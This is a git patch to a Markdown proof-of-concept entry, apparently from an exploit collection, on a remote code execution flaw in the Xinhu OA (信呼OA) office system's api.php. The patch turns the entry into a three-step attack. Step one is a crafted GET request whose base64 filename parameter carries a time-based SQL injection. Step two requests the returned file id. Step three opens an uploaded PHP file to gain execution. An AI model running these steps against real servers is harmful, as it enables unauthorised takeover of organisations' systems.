From 12144bb68e7ae3b4e4967bbb9ced00d13e44ab02 Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Mon, 31 Mar 2025 14:37:28 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E4=BF=A1=E5=91=BCOA=E5=8A=9E=E5=85=AC?=
 =?UTF-8?q?=E7=B3=BB=E7=BB=9F=E5=90=8E=E5=8F=B0api.php=E6=8E=A5=E5=8F=A3?=
 =?UTF-8?q?=E5=AD=98=E5=9C=A8RCE.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../信呼OA办公系统后台api.php接口存在RCE.md     | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)

diff --git a/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md b/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md
index 511ff5f..90cd9f3 100644
--- a/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md
+++ b/wpoc/信呼OA/信呼OA办公系统后台api.php接口存在RCE.md
@@ -8,7 +8,7 @@
 icon_hash="1652488516"
 ```
 
-## poc
+## 第一步
 
 ```javascript
 GET /xhoa/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP/1.1  
@@ -28,10 +28,19 @@ sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: "Windows"  
 ```
 
-![image-20241128092859877](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280928931.png)
+![image](https://github.com/user-attachments/assets/0f95005f-8c4f-45a0-bed2-eba493c7b87a)
 
+## 第二步
 
+```javascript
+访问：http://xxxx/api.php?a=getmfilv&m=upload|api&d=task&fileid=返回的id值
+```
 
-## 漏洞来源
+![image](https://github.com/user-attachments/assets/ba6f7a2e-8c59-4c08-a87f-8f778d2ee1c4)
+
+## 第三步
+```
+通过前面第二部获取的地址直接访问即可
+http://localhost/upload/2025-03/26_rocktpl5661_1363.php
+```
 
-- https://forum.butian.net/article/613